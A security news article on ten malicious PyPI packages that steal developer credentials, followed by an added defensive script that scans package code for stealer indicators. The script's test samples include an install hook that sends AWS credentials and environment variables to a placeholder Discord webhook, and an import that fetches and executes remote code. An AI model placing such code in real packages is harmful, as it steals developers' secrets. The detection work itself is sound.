10 malicious PyPI packages used to steal developer data
Security Affairs
10 packages were removed from the Python Package Index (PyPI) because they were found harvesting data.
Check Point researchers discovered ten malicious packages on the Python Package Index (PyPI). The packages install information stealers that allow hackers to steal developers’ private data and personal credentials.
The researchers provide details of the malicious packages:
- Ascii2text is a malicious package that mimics the popular art package in name and description. The code in its __init__.py file downloads and executes a malicious script that searches for locally stored passwords and exfiltrates them through a Discord webhook.
- Pyg-utils, Pymocks and PyProto2 are malicious packages that allow attackers to steal users’ AWS credentials.
- free-net-vpn and free-net-vpn2 are malicious packages developed to target environment variables.
- asynchronous-test downloads and executes malicious payloads.
- ZlibsrcName downloads and executes malicious payloads.
- WINRPCexploit is a malicious package that steals user credentials as part of its setup.py installation script.
- Navigatordiv is able to steal installers’ credentials by harvesting them and sending them to a predefined Discord webhook.
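The behaviours listed above share a small set of static indicators: setup.py or __init__.py code that reads AWS credential files, walks os.environ, carries a Discord webhook URL, or fetches and exec()s a second stage. The script below is an added example, not Check Point's tooling or code taken from any of the ten packages; it triages the files of an unpacked sdist with an AST walk and reports which indicators appear and whether any of them sit in setup.py (and so run on `pip install`, before the package is ever imported). The indicator lists, the sample sources, the placeholder webhook URL and the package names are constructed for illustration.

```python
"""Static triage of a Python distribution's install-time (setup.py) and
import-time (__init__.py) code for credential-file reads, environment
harvesting, Discord webhook URLs and download-and-execute patterns.
Added example; the sample sources below are constructed and are not the
real packages' code."""
import ast
import re
from dataclasses import dataclass

# Indicators drawn from the behaviours reported for the ten packages.
WEBHOOK_RE = re.compile(r"https?://(?:[\w.-]+\.)?discord(?:app)?\.com/api/webhooks/", re.I)
SECRET_PATH_RE = re.compile(r"(?:^|[/\\])\.aws(?:[/\\]|$)", re.I)
EXEC_NAMES = {"exec", "eval", "compile"}
ENV_ACCESS = {"os.environ", "os.getenv"}
# Calls that fetch or run remote content, or unpack a hidden payload.
NETWORK_OR_DECODE = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system",
    "base64.b64decode",
}


@dataclass(frozen=True)
class Finding:
    filename: str
    lineno: int
    indicator: str


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(filename, source):
    """Walk the AST once and report every indicator with its line number."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if WEBHOOK_RE.search(node.value):
                findings.append(Finding(filename, node.lineno, "discord-webhook-url"))
            if SECRET_PATH_RE.search(node.value):
                findings.append(Finding(filename, node.lineno, "aws-credential-path"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in EXEC_NAMES:
                findings.append(Finding(filename, node.lineno, f"dynamic-exec:{name}"))
            elif name in NETWORK_OR_DECODE:
                findings.append(Finding(filename, node.lineno, f"network-or-decode:{name}"))
        elif isinstance(node, ast.Attribute) and _dotted(node) in ENV_ACCESS:
            findings.append(Finding(filename, node.lineno, f"env-access:{_dotted(node)}"))
    return sorted(findings, key=lambda f: (f.filename, f.lineno, f.indicator))


def triage(files):
    """files: {relative path: source}. Returns (findings, runs_at_install).

    Anything flagged in setup.py executes during `pip install` of an sdist,
    before any of the package's own code is imported, so it is the
    highest-priority signal."""
    findings = [f for name, src in files.items() for f in scan_source(name, src)]
    runs_at_install = any(f.filename.endswith("setup.py") for f in findings)
    return findings, runs_at_install


# Constructed samples (placeholder names and webhook ID, not real packages).
BENIGN_SETUP = """
from setuptools import setup
setup(name="example-pkg", version="1.0.0", packages=["example_pkg"])
"""

# Modelled on the reported behaviour: harvest credentials during installation.
CREDENTIAL_STEALER_SETUP = """
import os, requests
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        creds = open(os.path.expanduser("~/.aws/credentials")).read()
        requests.post("https://discord.com/api/webhooks/0/PLACEHOLDER",
                      json={"aws": creds, "env": dict(os.environ)})

setup(name="not-really-a-vpn", version="0.1", cmdclass={"install": PostInstall})
"""

# Modelled on the reported behaviour: fetch and run a second stage on import.
DOWNLOADER_INIT = """
import urllib.request
exec(urllib.request.urlopen("http://example.invalid/stage2.py").read())
"""

if __name__ == "__main__":
    found, at_install = triage({"setup.py": CREDENTIAL_STEALER_SETUP,
                                "pkg/__init__.py": DOWNLOADER_INIT})
    for f in found:
        print(f"{f.filename}:{f.lineno}: {f.indicator}")
    print("runs at install time:", at_install)
```

This is triage, not a verdict: string concatenation, base64-wrapped stages or indirect imports defeat literal matching, and a clean scan proves nothing. The durable controls are to install from wheels rather than sdists where possible (`pip install --only-binary=:all:`), to pin dependencies with hashes (`--require-hashes`), and to review setup.py of anything new before it is allowed to run.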
Unfortunately, in recent months, many other malicious packages have been found on the official PyPI repository.
In June 2022, Sonatype researchers discovered several Python packages in the official PyPI repository that were developed to steal secrets (i.e. AWS credentials and environment variables) and upload them to a publicly exposed endpoint.
In November 2021, JFrog researchers discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that could steal Discord access tokens and passwords, and even carry out dependency confusion attacks.
“Supply chain attacks are designed to exploit trust relationships between an organization and external parties. These relationships may include partnerships, vendor relationships, or the use of third-party software. Cyber threat actors compromise an organization and then move up the supply chain, taking advantage of these trusted relationships to gain access to the environments of other organizations,” concludes the report. “These attacks have become more frequent and have had an increased impact in recent years, so it is essential that developers ensure the security of their actions, by double-checking each software ingredient used and in particular those downloaded from different repositories, especially those that weren’t self-created.”